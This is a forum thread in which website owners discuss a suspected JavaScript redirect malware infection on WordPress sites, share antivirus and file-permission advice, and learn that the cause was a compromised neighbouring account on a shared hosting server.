        • Profile picture of the author HeySal
          Originally Posted by lakeview View Post

          HeySal,

          It's Stress Free Wedding Planning

          Thanks so very much!!! I'm in a bit of a panic here.

          Angela
          So far so good for you Angela - might wanna download some free anti-virus ware that will detect it and just click around it everyday - Avast works, I've heard AGV does, too - not sure what else might but I know many don't.

          And if anyone posts codes that you don't understand on your site, just delete them. Not worth the risk and if they are doing so it's probably just spam at the very least anway.
          Signature

          Sal
          When the Roads and Paths end, learn to guide yourself through the wilderness
          Beyond the Path

          {{ DiscussionBoard.errors[872906].message }}
        • Profile picture of the author Kay King
          You don't need a virus to be going around to be hit if you're running 777 permissions.
          Thanks for asking that and getting it answered. I've been sitting here, too, thinking "why would anyone be running 777 permissions". Seems its the ability to set 777 that leaves the hole for this one.

          kay
          Signature
          Saving one dog will not change the world - but the world changes forever for that one dog
          ***
          One secret to happiness is to let every situation be
          what it is instead of what you think it should be.
          {{ DiscussionBoard.errors[873543].message }}
  • Profile picture of the author ECS Dave
    I copied the code from one of the pages, and uploaded it to virustotal.com and got this result:

    Virustotal. MD5: e47fd7ca9ad1adf9b0f8bba33e19fc5f JS:Bulered JS:Bulered

    And google's results for "JS:Bulered" are limited, to say the least..

    I tried several online JS decoders, but no go there either...

    Hmmm...

    Be Well!
    ECS Dave
    {{ DiscussionBoard.errors[872822].message }}
  • Profile picture of the author DigitalX
    does this effect if someone has hosted wordpress 2.7 on their shared hosting ? I did not upgraded to 2.8 yet ..
    {{ DiscussionBoard.errors[872872].message }}
    • Profile picture of the author HeySal
      Originally Posted by RobinX View Post

      does this effect if someone has hosted wordpress 2.7 on their shared hosting ? I did not upgraded to 2.8 yet ..
      Yes. Upgrading will not keep you from the virus - mine was just updated to 2.8 about an hour before it was whacked.

      Once again - have php, 777 permissions running? You can get hit. Can't get much clearer than that.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      {{ DiscussionBoard.errors[872890].message }}
      • Profile picture of the author Harry Behrens
        Originally Posted by HeySal View Post

        Once again - have php, 777 permissions running? You can get hit. Can't get much clearer than that.
        Whoa whoa whoa... 777 permissions?

        You don't need a virus to be going around to be hit if you're running 777 permissions. That's a huge security hole in and of itself. Anybody with some scripting knowledge and a bit of spare time can hit you like that.

        Always keep 644 permissions on your files and 755 permissions on your directories. Only change that if you specifically need to for a good reason (which, for me, after 5 years of web designing and IM'ing, has never happened).

        If in doubt, ask your hosting customer support what are the default file permissions on your server and how to change them. A lot of the big, good hosting servers that focus on security (eg HostGator etc) automatically apply tight permissions to every file behind the scenes. You really want to go with one of these if you're not comfortable with setting everything up on your own.
        Signature

        - Harry Behrens

        {{ DiscussionBoard.errors[872987].message }}
    • Profile picture of the author Nightengale
      Ok, I downloaded the free version of Avast (v. 4.8) and ran it while browsing my WP site. I'm not at all familiar with Avast so it took some clicking around before I figured it out.

      I clicked on "Web Shield" in the Avast utility and then browsed my site. According to Avast, I have no infections. (Whew!)

      Does this sound right? Did I do it right?

      If so, how do I now protect myself from this virus. Like most people here, I've invested A LOT of time and money into my site. I DO NOT need the headaches. (Like anyone else does! )

      "An ounce of prevention...." as they say. How do I now protect myself?

      Thanks,
      Michelle
      Signature
      "You can't market here. This is a marketing discussion forum!"
      {{ DiscussionBoard.errors[873705].message }}
  • Profile picture of the author Leon McKee
    Sal, I wanted to clarify what you had been doing when this all started for this specific occurrence. You indicated it was wordpress.com so did this happen on the wordpress.com site or "your" hosted site while browsing themes in WP 2.8? I'm wondering if you had been actually accessing the wordpress.org site via the "add new themes" option?

    Leon McKee
    {{ DiscussionBoard.errors[872925].message }}
  • Profile picture of the author lakeview
    Thank you so much for checking HeySal!!

    I'm using AVG and nothing was detected. I know practically noting about WP, but my issue looks to be possible attempted (unsuccessful) attacks. It also started shortly after I upgraded to WP 2.8.

    Angela
    {{ DiscussionBoard.errors[872949].message }}
  • Profile picture of the author HeySal
    Dave - I had previewed two themes - went to do a new search, I didn't check anything on the form but clicked to search. I had page 6 almost loaded when Avast went off so as far as I can tell it was page 6 of a general search with no parimeters selected.

    Ken - this isn't spyware - other than eventually it will deliver a rootkit (keylogger). It's a malicious worm that creates security holes, deposits false JS codes that redirect people from your site, then if unstopped lets in a rootkit to collect ALL data. Loads of fun. Toy compliments of Russia.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[872974].message }}
  • Profile picture of the author Leon McKee
    Thanks Dave! I'm starting to get the big picture now and the 777 clarification from Sal helps a lot. I'll check back later to see how this thread is coming along.

    Leon McKee
    {{ DiscussionBoard.errors[872980].message }}
  • Profile picture of the author HeySal
    hmbehrens - that is correct. But some people need to know that. That is only one of its targets - it's the programs that you can run 777 on themselves that are targeted no matter what permissions you have set.

    Peter - that is why I use Avast -never had a false positive yet.

    I just was reading and I saw that if you turn off your JS in your browser you can see these codes. Might be worth a try.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[873017].message }}
    • Profile picture of the author Harry Behrens
      Originally Posted by HeySal View Post

      hmbehrens - that is correct. But some people need to know that. That is only one of its targets - it's the programs that you can run 777 on themselves that are targeted no matter what permissions you have set.
      Yep I agree, I didn't mean to sound like I was dismissing your warning or anything like that, I was just noting it for anyone who might not know

      In general one should always have Avast or some other good and up-to-date antivirus with web-detect and blocking capabilities running. And keep alert for anything weird.
      Signature

      - Harry Behrens

      {{ DiscussionBoard.errors[873044].message }}
  • Profile picture of the author Peter Bestel
    Sal,

    I was running an up-to-date version of Avast when I got infected - 'something' disabled it and I couldn't switch it back on!!!

    I downloaded AVG and uninstalled Avast.

    I hear the new version of Norton is actually very good (horror of horrors) but it's true. May consider that.

    Peter
    {{ DiscussionBoard.errors[873063].message }}
  • Profile picture of the author oregoncountry
    I can't even find my post. What should I do? I just did a WP blog today I worked so hard and now Im hearing theres a virus there? I just had my ISP Satellite fried by lightning, as well as my antenna. I was out of commission(literally)for 8 days Can someone help me? Denise

    I have AVG and Avast is now installing so I can run it.
    Signature

    {{ DiscussionBoard.errors[873505].message }}
  • Profile picture of the author MizzCindy
    OK, I'm a bit confused, so please bear with me...

    You are running wordpress version 2.7.1. Correct?

    You were viewing available themes from wordpress.com and became infected via that route. Still correct?

    You arrived at the themes gallery (browsed to page 6) by clicking the 'Wordpress Theme Directory' link under 'Get More Themes' at the bottom of the 'Manage Themes' page under 'Appearance'. Am I still with the program?

    Now here's where my confusion comes in. I'm not understanding how you ended up at wordpress.com. When I mouse over the 'Get More Themes' link, it points to wordpress.org/extend/themes. So what am I missing? Does that link redirect to wordpress.com?

    I definitely want to understand this, since I have several wp blogs and I'm not too keen on having them go down in hacker-induced flames. Sorry if my post comes off as grilling you, I just want to make sure I'm clear on what happened...especially since I was just at wordpress.org earlier today browsing the themes. So far, no sign of any infestation, but now I'm a bit panicked!

    Thanks!
    Cindy
    {{ DiscussionBoard.errors[873616].message }}
    • Profile picture of the author Ken Strong
      Originally Posted by MizzCindy View Post

      Now here's where my confusion comes in. I'm not understanding how you ended up at wordpress.com. When I mouse over the 'Get More Themes' link, it points to wordpress.org/extend/themes. So what am I missing? Does that link redirect to wordpress.com?
      Here's what they have to say at the .com version about that:
      Something that has confused many people is the distinction between WordPress.org and WordPress.com. Let's clear it up. WordPress.com is brought to you by some of the same folks who work on WordPress, the open source blogging software. In addition, WordPress.com utilizes the same WordPress software which you can download at WordPress.org. With WordPress.com the hosting and managing of the software is taken care of by the team here at Automattic. With WordPress.org you need to install the software on your own server or with a 3rd party provider.
      So apparently two totally separate websites. So if one is infected, the other one isn't necessarily.
      {{ DiscussionBoard.errors[873655].message }}
  • Profile picture of the author HeySal
    Cindy - if mouse over says .org then it was .org. I'm not going back in to check that fact. I tried both .com and .org without logging in later, but from those pages it looked like .com had the theme directory. SO if I am wrong on that one, so be it - but I am not wrong about being in the theme directory and part of the url my avast gave me was:
    wordpress.com or net /????/install/ and at that point I was out of there so don't know the exact URL and didn't feel like sticking around to find out.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[873643].message }}
  • Profile picture of the author MizzCindy
    Thanks, Sal!

    So at that time were you actually attempting to download a theme or were you just browsing?

    I was browsing themes earlier today but didnt' download any. I also didn't get to the wordpress themes gallery through my admin page. I went there just by typing the url into my browser.

    It doesn't sound like you've had very much fun today! I'm sorry you've had deal with this.

    Cindy
    {{ DiscussionBoard.errors[873657].message }}
  • Profile picture of the author MizzCindy
    Thanks, to you, too, Ken! That's what I was thinking. Good to know I'm on the right track.

    So I wonder...if Sal saw a path that wasn't correct, could something hinky be going on with her computer or her site rather than the wordpress site?

    Or perhaps it was the .org path and Sal just didn't have time to see it fully while trying to get the heck out of there! I know that would be my first priority, too!

    Understanding where the infection came from is a pretty big deal, since that will have much to do with how high the risk is for everyone else and what behaviors we need to avoid.

    I'll say it again, Sal, I'm sorry you're having to deal with this mess. Not the most fun way to spend a Friday night.

    Cindy
    {{ DiscussionBoard.errors[873665].message }}
  • Profile picture of the author HeySal
    I had previewed 2, Cindy - but couldn't find what I wanted, so I had not attempted to install anything - but that's how these redirects work. You are right - when my Avast went off I cut the connection as fast as possible, but I truly thought that the theme menu was on .com. So that is wrong - people still know that they are at risk going in and browsing for themes at the least - for all I know the plugins and the Widgets have been hit, too. I'm sure not going to check them out for awhile.
    I figured .org and .com were the same owners - so sent the support ticket to .org which actually accepts support tickets. The tech that is doing that site sent more info to them and probably much more acurate. Now we just have to hope that they know what they are doing at wordpress to get rid of it.

    I'm out of here - if I haven't already said it, I don't know what else to add, there are people online that can probably explain this all with much more techinical intelligence than I possess - I just thought people better know that wordpress itself was infected.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[873696].message }}
  • Profile picture of the author MizzCindy
    Sal, thanks for taking the time to put out a warning.

    Cindy
    {{ DiscussionBoard.errors[873702].message }}
  • Profile picture of the author John_Cross
    Banned
    [DELETED]
    {{ DiscussionBoard.errors[874024].message }}
  • Profile picture of the author Peter Bestel
    WARNING!! (Now not needed because post deleted, thanks guys)

    Until it is deleted, do not attempt to check website in above post by John_Cross

    It links to pornographic site!!

    Never click a link from someone with such few posts - there's more than one reason why new members can't post links.

    Peter
    {{ DiscussionBoard.errors[874142].message }}
  • Profile picture of the author MizzCindy
    One thing I strongly suggest is to check out Craig Desorcy's ebook on securing your wordpress blog: Blog Lockdown (I think that's the name)!

    It's easy to follow and straight-forward, but provides some very powerful information on what you need to do to greatly decrease many of the security threats out there.

    Cindy
    {{ DiscussionBoard.errors[874982].message }}
  • Profile picture of the author zulfnore
    There seem to be a little bit of confusion here!
    For clarification purposes and to what i understand of the virus and its effect is that it attacks anything running on PHP that has JS attached to it. It is not correct to single out WP as the culprit or the only affected software.

    Most of the issues that are being report around WP are because of the environment it uses (i.e PHP and JS). to minimise the chances of being infected 1) Ask your hosting company to upgrade you to the latest version of PHP and 2) Deactivate all plug-ins that relay on JS to function till the security has been beefed up on your server.

    As an added precaution: Only install themes from trusted vendors and if you can then try not to add new themes to your site untill the threat has subsided.

    Once again the vulnerability is with PHP and JS not WP.
    {{ DiscussionBoard.errors[875161].message }}
  • Profile picture of the author HeySal
    With all due respect back at you -- I know where I was when I was alerted to the virus and I was in the themes on wordpress. That's just the way it is and I don't care who has never had a virus and who has, that's where I got the alert and when the problem started.

    If you think this is a minor problem or limited to just a few hosts, go ahead and think it. I'm not going to argue with you. I am giving this warning based on the experience I had at the wordpress site - not on second hand information.

    ALL I can say to your comments is that this is the first virus to ever hit my tech as well and I KNOW HIS credentials.......so good luck with this one.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[875456].message }}
    • Profile picture of the author rosetrees
      Thanks for the warning Sal. I backed up all my WP databases last night. I just wonder if, perhaps, you think the problem could have been an attack via your ISP?

      I ask because a couple of years ago I saw several computers infected with a worm that redirected to a p*** site. The common factor was the ISP.
      {{ DiscussionBoard.errors[875482].message }}
    • Profile picture of the author jtpratt
      Banned
      [DELETED]
      {{ DiscussionBoard.errors[875524].message }}
      • Profile picture of the author ExRat
        Hi Sal,

        the wordpress community is SO LARGE worldwide that if this were a huge problem (with a base of hundreds of millions of blogs installed on web hosts), it would be all over google and social media
        jtpratt does have a point there.

        I know where I was when I was alerted to the virus and I was in the themes on wordpress
        With respect, that doesn't really prove anything in relation to wordpress.com having a virus or not.
        Signature


        Roger Davis

        {{ DiscussionBoard.errors[875603].message }}
        • Profile picture of the author ebuyer123
          Thanks for ALL those good advice and valuable information.

          Now...how do I know if my WP or any other PHP based websites have been infected by this JS SOB malware?

          Simply do a virus scan or what? (or spyware scan...which one??)

          Regards,
          {{ DiscussionBoard.errors[875692].message }}
          • Profile picture of the author jtpratt
            Banned
            [DELETED]
            {{ DiscussionBoard.errors[875742].message }}
            • Profile picture of the author ebuyer123
              Originally Posted by jtpratt View Post

              You cannot virus or spyware scan wordpress on your host or php pages, etc. If your site was hacked it will show signs of it, odd content, redirection of pages, spam comments, or it will just go down.
              Thanks for the information, JTPratt.

              So it is my hosting company has to take care of the problem when my WP sites are infected or hacked?
              {{ DiscussionBoard.errors[875767].message }}
              • Profile picture of the author ECS Dave
                Originally Posted by ebuyer123 View Post

                Thanks for the information, JTPratt.

                So it is my hosting company has to take care of the problem when my WP sites are infected or hacked?
                Or you can go through how ever many files you have, and delete the code by hand... Not a fun task...

                Be Well!
                ECS Dave
                {{ DiscussionBoard.errors[875795].message }}
              • Profile picture of the author jtpratt
                Banned
                [DELETED]
                {{ DiscussionBoard.errors[875807].message }}
                • Profile picture of the author ebuyer123
                  Thanks for all the critical advices and vital info, mates.

                  By the way where to get a legitimate wordpress exploit checker? What this tool can do is to find 777 file permission, or anything else?

                  Regards,
                  {{ DiscussionBoard.errors[875890].message }}
                  • Profile picture of the author Peter Bestel
                    Originally Posted by ebuyer123 View Post

                    Thanks for all the critical advices and vital info, mates.

                    By the way where to get a legitimate wordpress exploit checker? What this tool can do is to find 777 file permission, or anything else?

                    Regards,
                    There are two tools you'd be advised having on all your WP blogs.

                    Exploit Scanner and WP Security Scan

                    You can download the Exploit Scanner from Wordpress at WordPress › WordPress Exploit Scanner WordPress Plugins

                    or direct from the author:

                    WordPress Exploit Scanner

                    This will point out any suspect coding within your files and dodgy plugins and themes.

                    The WP Security Scan will assess and recommend changes to file permissions, database security, passwords etc. You can download that from WordPress › WP Security Scan WordPress Plugins

                    Hope that helps.

                    I appear to have had the same trouble with my blogs as HeySal, more than likely originating from my compromised PC subsequently attacking my server. Personally, I've not witnessed any malicious activity direct from the Wordpress sites. Yes, while I was cleaning everything up I got an Avast warning whilst within my dashboard but this was caused by 'hacked' files within my own WP installation.

                    Peter
                    {{ DiscussionBoard.errors[876052].message }}
                    • Profile picture of the author ebuyer123
                      Originally Posted by Peter Bestel View Post

                      There are two tools you'd be advised having on all your WP blogs.

                      Exploit Scanner and WP Security Scan

                      You can download the Exploit Scanner from Wordpress at WordPress › WordPress Exploit Scanner WordPress Plugins

                      or direct from the author:

                      WordPress Exploit Scanner

                      This will point out any suspect coding within your files and dodgy plugins and themes.

                      The WP Security Scan will assess and recommend changes to file permissions, database security, passwords etc. You can download that from WordPress › WP Security Scan WordPress Plugins Peter
                      Many thanks, Peter.

                      This wp virus stuff is both troublesome and time consuming especially for non-IT folks.

                      Regards,
                      {{ DiscussionBoard.errors[877519].message }}
                    • Profile picture of the author ebuyer123
                      Originally Posted by Peter Bestel View Post

                      There are two tools you'd be advised having on all your WP blogs.

                      Exploit Scanner and WP Security Scan

                      WordPress › WordPress Exploit Scanner WordPress Plugins

                      This will point out any suspect coding within your files and dodgy plugins and themes.

                      The WP Security Scan will assess and recommend changes to file permissions, database security, passwords etc. WordPress › WP Security Scan WordPress Plugins
                      Hi,
                      Now I already have these two big boys installed on my wp site, but how I am going to use them? I mean how do I start a scan?

                      Is that mean if I have 10 wp sites, then I have to do 10 separate installations for all my sites?

                      Thanks.
                      {{ DiscussionBoard.errors[880372].message }}
                      • Profile picture of the author Peter Bestel
                        Originally Posted by ebuyer123 View Post

                        Hi,
                        Now I already have these two big boys installed on my wp site, but how I am going to use them? I mean how do I start a scan?

                        Is that mean if I have 10 wp sites, then I have to do 10 separate installations for all my sites?

                        Thanks.
                        As far as I know, yes, you have to perform the scans on each and every blog.

                        Running them is easy. After install, go to your WP dashboard. Expand the Dashboard menu and you'll notice "Exploit Scanner". Click this and then select 'Search Files and Database'. I can't help you with the results as I'm no expert, best to Google any results you're not sure of.

                        With The Security Scanner you should have an extra menu at the bottom of your WP Dashboard home menu labelled 'Security'. Click this to see its suggestions.

                        Once again, I'm no expert in how to interpret the results, but if you purchase Craig Desorcy's product, Blog Lock Down, he goes into detail - well worth the investment

                        Peter
                        {{ DiscussionBoard.errors[880413].message }}
            • Profile picture of the author ECS Dave
              Originally Posted by jtpratt View Post

              You cannot virus or spyware scan wordpress on your host or php pages, etc. If your site was hacked it will show signs of it, odd content, redirection of pages, spam comments, or it will just go down.

              If your Windows based computer was infected from browsing or installing a rogue theme your antivirus should go off and alert you.
              Just a thought...

              You might want to rephrase...


              If your site was hacked it MAY show signs of it, odd content, redirection of pages, spam comments, or it will just go down.
              From my reading/research, a good many exploits, script injections, what-have-you,
              also work quite silently in the background, doing their damage...

              If your Windows based computer was infected from browsing or installing a rogue theme your antivirus should go off and alert you.
              There's also a great many not-so-tech-savvy computer owners/users who
              have a FALSE sense of security, running an old or outdated virus protection utility,
              or one that has not been updated with the latest "definitions".
              And, not all VDU's are created equal...

              Be Well!
              ECS Dave
              {{ DiscussionBoard.errors[875787].message }}
      • Profile picture of the author ECS Dave
        Originally Posted by jtpratt View Post

        My word on this matter doesn't have to be believed, just start googling...the day that there are thousands+ relevant results for the keywords "wordpress js redirect virus" you will be right. I am betting my reputation that today, tomorrow, next week, next month, the rest of the year, and future forward there will NEVER be any results for this.

        The day it's a widespread problem is the day you can find it easily all over the web, and not in just this forum thread.
        If you don't limit the search with "quotes",
        wordpress js redirect virus - Google Search
        there are ~41,000 results on google...

        If you think about this, when a new exploit is found, exactly how
        many results are you going to find? How many updates to wordpress
        have there been? Other php softwares? Other softwares? Hardwares?

        Be Well!
        ECS Dave
        {{ DiscussionBoard.errors[875739].message }}
  • Profile picture of the author ECS Dave
    Hello Warriors,

    As I stated in a previous reply (and as HeySal stated), this issue appeared to
    occur when Sal was browsing themes, using the Add New Themes interface,
    on a self-hosted, self-installed, wordpress blog. At the time she was browsing
    the themes, the blog was 2.7, as provided by the fantastico utility.

    Further investigation, by me, showed that the host got "hacked", "injected",
    whatever you wish to term it, across multiple sites on "my" account. My host's
    tech support team is still investigating this issue.

    Now whether or not the "hack" did, or did not come from Sal's theme browsing
    is certainly something that needs investigating as well. With the HUGE number
    of themes that can be seen from "browsing", it's quite possible that one, or more
    could be, or had/have been compromised.

    I am not here to point fingers, make accusations, or the like. We are all human,
    and are not perfect. The software is written by humans, the themes, etc...

    The sub-humans that derive such joy from f'ing things up are there, doing
    what they do, and we try to do our best to shield ourselves, and our sites
    from them. Discoveries, such as Sal's, are what help us combat this scourge.

    Be Well!
    ECS Dave
    {{ DiscussionBoard.errors[875717].message }}
    • Profile picture of the author stevenh512
      Originally Posted by ECS Dave View Post

      At the time she was browsing the themes, the blog was 2.7, as provided by the fantastico utility.
      In my experience (not just with Wordpress, this goes for any script) installing the latest version by hand is almost always a better option than using Fantastico. Once you get the hang of it, you can install a script by hand almost as fast as Fantastico can (or I can anyway, especially on hosts like HostGator where you don't have to fool with permissions). If you look at the changelogs and fixed tickets for the 2.7.1 and 2.8 release you'll see quite a few security problems that were fixed in that time along with all the "eye candy" and API improvements they've given us.

      Now whether or not the "hack" did, or did not come from Sal's theme browsing is certainly something that needs investigating as well. With the HUGE number of themes that can be seen from "browsing", it's quite possible that one, or more could be, or had/have been compromised.
      I'm not sure that simply browsing themes would open you up to a vulnerability like this (installing a theme, on the other hand, could). I'm curious, were there older versions of any other scripts that have recently had widely exploited code injection vulerabilities? For example, SMF up to and including version 1.8 was being hacked like crazy and the hacker usually planted a "php virus" that would infect a whole hosting account like this with javascript iframes and redirects. There was a similar exploit in a few gallery scripts recently, and I've heard of people being hacked through PHPBB but in that case I'm not sure if the exploit (or the usual result) is the same.

      edit: to clarify above and add this..

      Speaking of HostGator, some of their PHP settings are "bad" out of the box. PHP register_globals is on (opens up quite a few scripts to code injection, SQL injection, cross-site scripting and other exploits), magic_quotes_gpc is off (opens up SQL injection exploits in scripts that don't properly "sanitize" form input.. I know of two widely-used IM scripts that have this problem). Personaly I don't like allow_url_fopen (I'd rather use curl for that lol) but a lot of PayPal IPN scripts use it so I went ahead and left that one on. You can get to these settings (on HostGator anyway) by scrolling down to "Software / Services" in your cpanel and clicking "php.ini QuickConfig".
      Signature

      This signature intentionally left blank.

      {{ DiscussionBoard.errors[875841].message }}
  • Profile picture of the author HeySal
    DAVE --- UH...I was searching AFTER you already updated the script.

    Here's more information about these infections for those of you who are worried and those of you who feel you know too much to be concerned about this crap. Most of what I am googling is still individual users asking for help when they are hit with this - being that the search turned up results in the millions, this might not be as negligible as some would like you to believe. Anyway - some interesting links below.

    If you think you can't get it - remember this - you might be safe from drive by sites - but it was delivered to MY main site by a live hacker who signed on as a member. It wasn't just a drive by bot locating us.

    From what I have read, these redirects have been around for awhile .......but they are now more virulient because they are now using encryption.

    I'm not going to apologize for my report that I got this from wordpress itself. Who knows if some of their themes are infected when they accept them - who knows what else might have happened or what hacker might find their way in.
    I was browsing their themes and the address of the damned virus was www.wordpress..../install/
    For my money that means ON their site and they have gotten 2 reports about it now so let them sort it out. I have reported this event just as it happened to me. Let THEM tell me I didn't get it there. I haven't heard that yet. I am sure waiting to.



    a bit of an explanation
    Virus Bulletin : News - Hundreds of legitimate websites being hacked into

    In fact, there are actually hundreds of compromised domains across the internet which we've seen over the last few days that have been infected. It seems some obfuscated javascript is being injected into these sites, which attempts to redirect the user to another domain hosting a malicious payload.
    From Sophos - Anti-virus, anti-spam and encryption software for businesses blogs Uncategorized | SophosLabs blog
    There are a few articles on that page about the redirect viruses.

    Seems wikipedia was hit, too. I wonder how many posts he will make before
    he can say wiki is clean?
    The Wikipedia Review > Sorry about that

    USAToday.com hit with redirect: Does this qualify as "not in the news?" lol.
    USAToday.com says:
    May 21, 2009 at 2:38 pm

    USATODAY.com was notified about a potential problem with one of our advertisements. We investigated the situation and disabled the ad at 1:25 PM EST on May 7, 2009. It appears that advertisements, which ran between 9-10 AM EST on May 7, 2009, may have contained malicious advertising ("malware"). Upon learning of the unwanted activity on USATODAY.com, we promptly took down the advertisements and will continue our investigation as to the source of the problem. We apologize for any inconvenience the situation may have caused. You may wish to update your anti-virus software to help protect against and block malware and other viruses. - The USATODAY.com Team


    Wow - this has been around longer than I thought. No wonder it is becoming so
    prevalent.
    'Link hack' redirects MySpace visitors to phishing site > Web > Vulnerabilities & Exploits > News > SC Magazine Australia/NZ

    Here's a quote from the Vermont Information Security website that has a 6 figure infection report on it -- as early as last year.
    Nope - nothing to see here folks....move along.
    In April 2008 Panda Labs, a computer security and anti-virus publisher, announced that more than 280,000 web sites had been altered to redirect computers to malicious websites which would attack them in a variety of different ways. The SANS Institute, a computer security research and training organization, recently declared browser attacks to be "Top Cyber Security Menace" for 2008.
    ISn't this all just a lot of fun?

    And don't count on your hosts to be helpful. I am using HostExcellence which has won awards for its hosting. When I contacted them about this I got a very unexpected "Your problem not ours" answer from them. My tech actually had to contact them to tell them to pull a few of THEIR files off our account. They didn't put fresh ones back on. I suppose they want us to TELL them to do so. Instead I am getting ready to move to a more security minded and savvy server. Screw that attitude.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[876012].message }}
  • Profile picture of the author HeySal
    Peter - actually I think it was an infected theme they have listed rather than the whole site - but you have personally experienced how the thing spreads. Let me reiterate - this isn't a WP thing - it's a PHP thing. Just so much WP and so many rss feeds attached that these are getting more attention.

    Dump off your ftp until you are clean and install a new one - it uses the FTP as one means to get in and out once it's there as far as Fin saw. As I also said earlier - the worm builds holes before it dumps codes. Shuts down abilities to find it, too. Some of it's encrypted. It's getting real quick, too. It's gotten worse just since my main site was hacked. The one that you get on your own pc will actually knock out your ability to find websites that have scripts to kill it. Misspelling the file just slightly will help in a websearch to kill it.

    This thing is just invasive and evil.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[876077].message }}
  • Profile picture of the author Peter Bestel
    Sal,

    I'm reasonably confident that my PC is now clean as I was able to download all necessary fixing progs via another clean PC.

    I've already dumped my FTP prog (Filezilla) and I've switched to Secure FTP using WinSCP. Every login for every site has been changed, every name and every password for my databases have been changed. It's all been done using Roboform to avoid keylogging and I will go through the same process on a monthly basis.


    Peter
    {{ DiscussionBoard.errors[876102].message }}
  • Profile picture of the author HeySal
    Oh for Christ sakes, Pratt - My MAIN site was hacked --- this one is a different site that was just in the process of being built - not even active yet......please read what I said before you get all irate at me.

    I HAVE contacted wordpress themselves (thought I already said that, too) and I am WAITING for a response -- from them.
    I will report back on what wordpress themselves has to say about it when they answer my report to them. If you have a problem with that, too - then you have a problem with it. But THEY are the ones who are going to tell me different. Not anyone else. This is ridiculous.

    As far as anyone else having problems -- if they don't have the right anti-virus, they'll never even know they have it, let alone where they picked it up.

    Linux/Max - don't know if they can or can't be ---- but now you are talking about personal computers -- and in here we are talking WEBSITES. Both get hit, though.

    I have already STATED I am NOT a tech - I reported here what happened, and what I was doing at the time-- if I turn out to be wrong, that is a good thing, but I sure wanted to save anyone else the problem because it is HELL to fix it.

    IF YOU are impervious, then you are in a terrific position. Right now I am getting ready to move my main site to another server who has 24/7 monitoring and I am hoping that will be it for that site.
    I am also greatly considering getting off MS and going to Linux and just putting up with what I assume will be a learning curb that will slow down my production right when I need the speed.

    I breezed some links so you could see what is going on since you seem to think there isn't much problem with this virus. USAToday - was a redirect. I forgot to post the link. I also thought the wiki report was talking about WIKI itself, not just his site. I was just trying to deliver more info and was in too much of a hurry to do it well.

    Now I don't really have time to argue with you. I posted what happened in hopes of saving someone else from this thing. When wordpress answers either Dave or my contact, I will let people know what THEY say. As for now, Dave's host and he are working on his account to clean it off - it's being a pain for them - just as Peter found it to be on his. Until WORDPRESS explains to me that the fact that I was working on an unpublished site inside of an admin interface with their site yet didn't get the virus on their site -- I am going to believe my Avast and it told me that page was infected-- No matter whos names or what links we can pass back and forth or whatever questions can be examined.

    I don't have any more time for this. Will post whatever Wordpress has to say about it when either Dave or I hear back from them.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[876379].message }}
  • Profile picture of the author ECS Dave
    Another update here, from your friendly,
    and right neighborly, ECS Dave!

    Just got another update from the folks over to the hosting company,
    where this appears to have all started...

    From what I can tell, it was NOT Sal's browsing of the wordpress themes...
    In fact, it had little or nothing to do with wordpress at all...

    It appears that this ATTACK happened at approximately the same time
    that Sal was browsing the themes, and understandably became concerned
    that it may have been related...

    The support guys tell me that a server "neighbor" had a script installed
    on their account that had some "vulnerabilities", and as of my latest
    communication with support, that account has been disabled.

    I was also told, that it was NOT anything on my accounts, that was
    the culprit. In fact I was informed that it was quite widespread on
    the "shared" server, and that the technical support staff had engaged
    a security expert to track down the errant script, and that this same
    staff were working feverishly to clean the machine of all traces of the
    ATTACK.

    More details, as I get them...

    Be Well!
    ECS Dave

    P.S. Here's the reply I received, when I asked if it was something on, or within "my" account...
    No - it wasn't you. You were affected unfortunately.
    The neighbor account was deleted. We'll let you know more as we know more.
    {{ DiscussionBoard.errors[876488].message }}
  • Profile picture of the author ECS Dave
    One more thing, in the interest of easing folks' minds about
    wordpress, and the security therein:

    Hardening WordPress WordPress Codex

    There you have it... (and that post is a very good read, for FREE!)

    Be Well!
    ECS Dave
    {{ DiscussionBoard.errors[876512].message }}
  • Profile picture of the author HeySal
    So the fact that I was cruising Wordpress when my alarm went off was a coincidence and not a wordpress file.

    That is actually good to know - even if I have to admit I was wrong --
    Now I have a very good question to ask that maybe a security expert can answer.
    Why was the URL of the virus www.wordpress...../install/ if it was actually something on another website. I don't understand this at all.

    Does this thing mimic any URL that you are on at the time when it hits and that is why it's so hard to tell the source? Or did my Avast think that it was that page because that is where I was browsing when the site was hit?

    Anyone know? Even if this wasn't on Wordpress itself - there is still one hell of a mean and versatile virus out there and it'd be nice to know what's going on with it.

    I think I'll go to Avast and see what they have to say. Maybe someone there knows.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[876957].message }}
    • Profile picture of the author stevenh512
      Originally Posted by HeySal View Post

      Why was the URL of the virus www.wordpress...../install/ if it was actually something on another website. I don't understand this at all.

      Does this thing mimic any URL that you are on at the time when it hits and that is why it's so hard to tell the source? Or did my Avast think that it was that page because that is where I was browsing when the site was hit?
      I've been using Avast for a long time, and while I think it's the best of the "free" virus scanners, it's always had a problem with "false positives" (I have quite a few files on my hard drive that show as virus/trojan when I know for a fact they're clean and have the source code to prove it). In this case it doesn't seem like it's a "false positive" since ECS Dave has confirmed that the server was compromised, just that it gave you the wrong URL. The only reason I can think of for that, is maybe the wordpress.com url was the last request your browser sent out before Avast detected the virus. In that case, I can see how it might report that as the offending URL even if it really wasn't.

